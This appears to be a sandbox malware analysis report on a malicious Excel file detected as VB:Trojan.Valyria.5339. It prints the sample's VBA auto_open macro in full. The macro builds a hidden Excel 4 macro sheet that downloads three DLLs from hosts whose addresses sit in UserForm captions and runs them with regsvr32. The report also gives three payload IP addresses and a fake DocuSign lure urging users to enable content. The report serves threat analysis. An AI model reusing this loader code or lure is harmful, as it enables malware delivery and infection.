Malicious
Classifications
-
Threat Names
VB:Trojan.Valyria.5339
Dynamic Analysis Report
Created on 2021-09-25T10:35:00
2013496fe5524988c28357245d684cdca787b47c0b3b16cae20b3222977d769b.xlsx.xls
Excel Document
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
File Name | Category | Type | Verdict | Actions |
---|
C:\Users\RDhJ0CNFevzX\Desktop\2013496fe5524988c28357245d684cdca787b47c0b3b16cae20b3222977d769b.xlsx.xls | Sample File | Excel Document |
malicious
|
...
|
»
File Reputation Information
»
Verdict |
malicious
|
AV Matches (2)
»
Threat Name | Verdict |
---|---|
VB:Trojan.Valyria.5339 |
malicious
|
VB:Trojan.Valyria.5339 |
malicious
|
Office Information
»
Creator | Test |
Last Modified By | Drywhtt |
Create Time | 2015-06-05 18:17:20+00:00 |
Modify Time | 2021-09-20 11:41:03+00:00 |
Codepage | ANSI_Cyrillic |
Application | Microsoft Excel |
App Version | 16.0 |
Document Security | NONE |
Titles Of Parts | Sheet1 |
scale_crop | False |
shared_doc | False |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (2)
»
Macro #1: Module1
»
Attribute VB_Name = "Module1"
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet3"
Sheets("Sheet3").Visible = False
Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption
Sheets("Sheet3").Range("K17") = "=NOW()"
Sheets("Sheet3").Range("K18") = ".dat"
Sheets("Sheet3").Range("H35") = "=HALT()"
Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet3").Range("I10") = UserForm1.Caption
Sheets("Sheet3").Range("I11") = "JJCCBB"
Sheets("Sheet3").Range("I12") = "Byukilos"
Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
Sheets("Sheet3").Range("G11") = "..\Xertis1.dll"
Sheets("Sheet3").Range("G12") = "..\Xertis2.dll"
Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
Sheets("Sheet3").Range("H18") = "=EXEC(I18)"
Sheets("Sheet3").Range("H19") = "=EXEC(I19)"
Application.Run Sheets("Sheet3").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet3").Delete
Application.DisplayAlerts = True
End Sub
Macro #2: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
If Not m_openAlreadyRan Then Workbook_Open
End Sub
Private Sub asWorkbook_Activateas()
On Error Resume Next
If m_isOpenDelayed Then
m_isOpenDelayed = False
InitWorkbook
End If
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
m_openAlreadyRan = True
Dim objProtectedViewWindow As ProtectedViewWindow
'
Set objProtectedViewWindow = Application.ProtectedViewWindows(Me.Name)
On Error GoTo 0
'
m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
If Not m_isOpenDelayed Then InitWorkbook
End Sub
Private Sub ssaaInitWorkbookssaa()
On Error Resume Next
If VBA.Val(Application.Version) < 12 Then
MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
Me.Close False
Exit Sub
End If
'
'Other code
'
'
'
End Sub
Extracted Image Texts (1)
»
Image 1: 0.JPG
»
DocuSign
Your DocuSign Document is Protected
VIEW COMPLETED DOCUMENT
THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT,
ENCRYPTED BY DOCUSIGN.
DocuSign Document Application Instruction
1. Click on “ENABLE EDITING” button to unlock the document downloaded from the Internet.
2. Click on “ENABLE CONTENT” button to perform Microsoft Exel Decryption Core to start the decryption of
the document.
Do Not Share This Email
Ths email contains a secure information Picase do not share thes email, knk, of access informaton with others
I you need to modity the document of have questions aboul the dotats in tho document, please reach out to the sender by emailing them drectly,
CFB Streams (20)
»
Name | ID | Size | Actions |
---|---|---|---|
Root\Workbook | 1 | 176.57 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook | 4 | 2.94 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\Sheet1 | 5 | 991 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\UserForm1 | 6 | 1.17 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\Module1 | 7 | 3.68 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 | 8 | 212 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 | 9 | 206 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT | 10 | 3.77 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\dir | 11 | 864 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 | 12 | 1.96 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 | 13 | 138 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm1\f | 15 | 226 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm1\o | 16 | 272 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm1\CompObj | 17 | 97 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm1\VBFrame | 18 | 301 Bytes |
...
|
Root\_VBA_PROJECT_CUR\PROJECTwm | 19 | 116 Bytes |
...
|
Root\_VBA_PROJECT_CUR\PROJECT | 20 | 603 Bytes |
...
|
Root\SummaryInformation | 21 | 208 Bytes |
...
|
Root\DocumentSummaryInformation | 22 | 240 Bytes |
...
|
Root\CompObj | 23 | 103 Bytes |
...
|
Extracted URLs (3)
»
URL | WHOIS Data | Reputation Status | Recursively Submitted | Actions |
---|---|---|---|---|
http://103.155.92.211 |
Not Queried
|
N/A
|
- |
...
|
http://193.38.54.149 |
Not Queried
|
N/A
|
- |
...
|
http://94.140.114.44 |
Not Queried
|
N/A
|
- |
...
|
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\forms\excel.box | Dropped File | Unknown |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\temp\~dfcf87438905ed2d8b.tmp | Dropped File | OLE Compound |
clean
Known to be clean.
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\temp\~df47fd94e12aafce74.tmp | Dropped File | Stream |
clean
Known to be clean.
|
...
|
»